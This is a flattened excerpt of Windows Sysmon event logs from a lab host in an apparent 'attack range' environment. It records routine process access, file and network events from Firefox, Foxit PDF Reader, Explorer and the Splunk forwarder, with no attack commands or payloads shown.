insufficient disk space 10341000x800000000000000043112Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.068{FE4C2B44-E48F-63C7-3106-00000000AF02}32965516C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E492-63C7-3806-00000000AF02}3692C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+269b6|C:\Program Files\Mozilla Firefox\xul.dll+e8dca7|C:\Program Files\Mozilla Firefox\xul.dll+e87879|C:\Program Files\Mozilla Firefox\xul.dll+e7ce0c|C:\Program Files\Mozilla Firefox\xul.dll+2056112|C:\Program Files\Mozilla Firefox\xul.dll+1acf5b8|C:\Program Files\Mozilla Firefox\xul.dll+1ad176f|C:\Program Files\Mozilla Firefox\xul.dll+1e87b83|C:\Program Files\Mozilla Firefox\xul.dll+1eefedb|UNKNOWN(000003E2E1333E90) 10341000x800000000000000043111Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.068{FE4C2B44-E48F-63C7-3106-00000000AF02}32965516C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E492-63C7-3706-00000000AF02}4504C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+269b6|C:\Program Files\Mozilla Firefox\xul.dll+e8dca7|C:\Program Files\Mozilla Firefox\xul.dll+e87879|C:\Program Files\Mozilla Firefox\xul.dll+e7ce0c|C:\Program Files\Mozilla Firefox\xul.dll+2056112|C:\Program Files\Mozilla Firefox\xul.dll+1acf5b8|C:\Program Files\Mozilla Firefox\xul.dll+1ad176f|C:\Program Files\Mozilla Firefox\xul.dll+1e87b83|C:\Program Files\Mozilla Firefox\xul.dll+1eefedb|UNKNOWN(000003E2E1333E90) 10341000x800000000000000043110Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.068{FE4C2B44-E48F-63C7-3106-00000000AF02}32965516C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E492-63C7-3606-00000000AF02}1472C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+269b6|C:\Program Files\Mozilla Firefox\xul.dll+e8dca7|C:\Program Files\Mozilla Firefox\xul.dll+e87879|C:\Program Files\Mozilla Firefox\xul.dll+e7ce0c|C:\Program Files\Mozilla Firefox\xul.dll+2056112|C:\Program Files\Mozilla Firefox\xul.dll+1acf5b8|C:\Program Files\Mozilla Firefox\xul.dll+1ad176f|C:\Program Files\Mozilla Firefox\xul.dll+1e87b83|C:\Program Files\Mozilla Firefox\xul.dll+1eefedb|UNKNOWN(000003E2E1333E90) 10341000x800000000000000043109Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.068{FE4C2B44-E48F-63C7-3106-00000000AF02}32965516C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E491-63C7-3406-00000000AF02}6288C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+269b6|C:\Program Files\Mozilla Firefox\xul.dll+e8dca7|C:\Program Files\Mozilla Firefox\xul.dll+e87879|C:\Program Files\Mozilla Firefox\xul.dll+e7ce0c|C:\Program Files\Mozilla Firefox\xul.dll+2056112|C:\Program Files\Mozilla Firefox\xul.dll+1acf5b8|C:\Program Files\Mozilla Firefox\xul.dll+1ad176f|C:\Program Files\Mozilla Firefox\xul.dll+1e87b83|C:\Program Files\Mozilla Firefox\xul.dll+1eefedb|UNKNOWN(000003E2E1333E90) 23542300x800000000000000043108Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.068{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043107Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.031{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shmMD5=727B15E1B7B9689E31DB7AE90B314AAC,SHA256=54EC5B4AB64EA6355C9BEC537B1288E15A6014B8BDD3EA1B58AC113530DD27C3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043106Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.031{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043105Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.031{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043104Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.031{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043103Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.031{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=5C8DA90631953E36B6A0FCC82DC3D255,SHA256=841106C96D24A6357898D34C645CE65E0C4E90E0F522CF6C86AFD5F566CE8DEA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043102Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.031{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043101Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.031{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043100Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.030{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\2752s6y5.default-release\startupCache\startupCache.8.littleMD5=091C705B5FC4B3F6B1449068AA83EA08,SHA256=523502A3063411B0133823D2D2D1761CE93AA911D42855CF92AE8DF64FFFB626,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043099Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.014{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=09DE7B9CC229ABB353A61387BBB2B262,SHA256=05E55C1D077A381596D3CDA93517F259BF2BA5413D0265B1DF42B0687A162EE0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043098Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.014{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=D539723C21C01CB8504A04FF3E4FAC8E,SHA256=A0D8E3F410F3376E1BA14652F07D6EA14E42D9A330FE7229BA39895745EB767E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043097Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.014{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=67E7B5F210911502B0FE25395136AF5D,SHA256=2AF3500E1C0298FAE15891125B90255DA2149C0E8E195F84A6D99BD5AD96D9D0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043096Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.014{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\events\newtabMD5=928B32284D84B439FA8FB61EAB23B5DC,SHA256=F9062D42BFDB85CB98895C4535D048FFE39F47EBACE527D929FCAFF84A0B8914,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043095Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.014{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=542C0E75A12674C2AF90FCDD4749FCC0,SHA256=17CAAC170E37884F0FB4CCC7B8A7A62F654989E6529277FD2ED4822106894B81,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043094Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:53.999{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=4C64F8F96AF9C10F9DC39E8C7291F86A,SHA256=723E7AF45A9197FEF7EF230DFDD78E0B012CA3836F65F2EADF1DA8BDDB30E14F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043093Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:53.999{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=2AFC911266822B29A83BEF1A30165E79,SHA256=CCE5837CD9FAA7D70F84BE69EB5228170387F7DE9665F49F449BC001575C91BD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043092Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:53.999{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=6C3F1074D5CDBABFC8F03888876FD539,SHA256=648DF95A6AEB4E101A8DDCFC52502A511DCB103ECB1EB13F67A7609138F5C2A5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043091Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:53.999{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\events\newtabMD5=ABD9FAF123BE1BB44989780F234DDC8F,SHA256=C2154B30A008D7AC529A03643E89D90C5F11013ABCC0DF8927D5A2D06BD8F7B8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043090Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:53.999{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=19FD6E8B7ECAA9D5C00F59B66DAFDD65,SHA256=71650984AFDE957546016449AC053FE99964B82A27CADF9FC2324277224B1129,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016741Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:55.791{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D44BEA247CB171B8EC7BB1F8AB727E83,SHA256=C74D5A40AB0AD9E146F8E9471EBA0F9E72BF4E9E55B9E0893F69CBEEFB21682D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043286Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:55.959{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=2A609E2BC75DDB11DFF2AA98A9450FC7,SHA256=9D524822F374F8D108AA663791103076FF47AB0C045B8E30B53743113A92E7F4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000043285Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.008{00000000-0000-0000-0000-000000000000}3596<unknown process>-tcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56336-false34.120.208.123123.208.120.34.bc.googleusercontent.com443https 23542300x800000000000000043284Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:55.649{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2492D2AF43CFD29B98488B0A721507CD,SHA256=8BA03D8806CA1313E58CBAD89B3D998DAB0C90AD81FCF3B42ACA27BFFC29F2A7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000043283Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:53.609{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56335-false10.0.1.12-8000- 354300x800000000000000043282Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:53.524{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local49722- 23542300x800000000000000043281Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:55.028{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\ProgramData\Foxit Software\Foxit PDF Reader\FoxitSensor\Sensor.db-journalMD5=F9492F1FA44589E97903EF7068143D44,SHA256=5DCC65AD4F9219BC1AB1E843690E6229F1625EE4C9A8CFE26186604642EBE026,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016742Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:56.877{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B75A55820E28FCCC79718C3E460BD2B,SHA256=345A2C9E245D1A36F07622D9A51EF18D1A59B5EAFC17B7EF389AD9415471A595,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000043292Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.326{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56340-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000043291Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.326{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56340-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000043290Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.045{00000000-0000-0000-0000-000000000000}6948<unknown process>-tcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56339-false34.120.208.123123.208.120.34.bc.googleusercontent.com443https 354300x800000000000000043289Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.015{00000000-0000-0000-0000-000000000000}5300<unknown process>-tcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56338-false34.120.208.123123.208.120.34.bc.googleusercontent.com443https 354300x800000000000000043288Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.015{00000000-0000-0000-0000-000000000000}6820<unknown process>-tcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56337-false34.120.208.123123.208.120.34.bc.googleusercontent.com443https 23542300x800000000000000043287Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:56.026{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C415BD4D1D897E75ABCB2E0E90E5FF85,SHA256=EAB30B1D4C176ECC13D8FC0435CF043AABE4B169E3C6E416FB6F7223D13D303E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016744Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:57.962{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35CC5423FC02AA3C5D8C23929151B117,SHA256=E16E19A4B2339EC065452D45FE361EF793C51666172DF471AE50011528C7638A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000043301Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:57.233{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002688C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\NPSMDesktopProvider.dll+1be4a|C:\Windows\System32\NPSMDesktopProvider.dll+1226e|C:\Windows\System32\NPSMDesktopProvider.dll+12835|C:\Windows\System32\NPSMDesktopProvider.dll+67dc|C:\Windows\System32\TwinUI.dll+7bfb8|C:\Windows\System32\TwinUI.dll+7559d|C:\Windows\System32\TwinUI.dll+75173|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043300Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:57.233{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005708C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043299Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:57.233{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005708C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043298Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:57.233{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005708C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043297Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:57.155{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8ab30|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043296Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:57.155{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+1078f0|C:\Windows\System32\SHELL32.dll+8aaec|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043295Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:57.155{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF 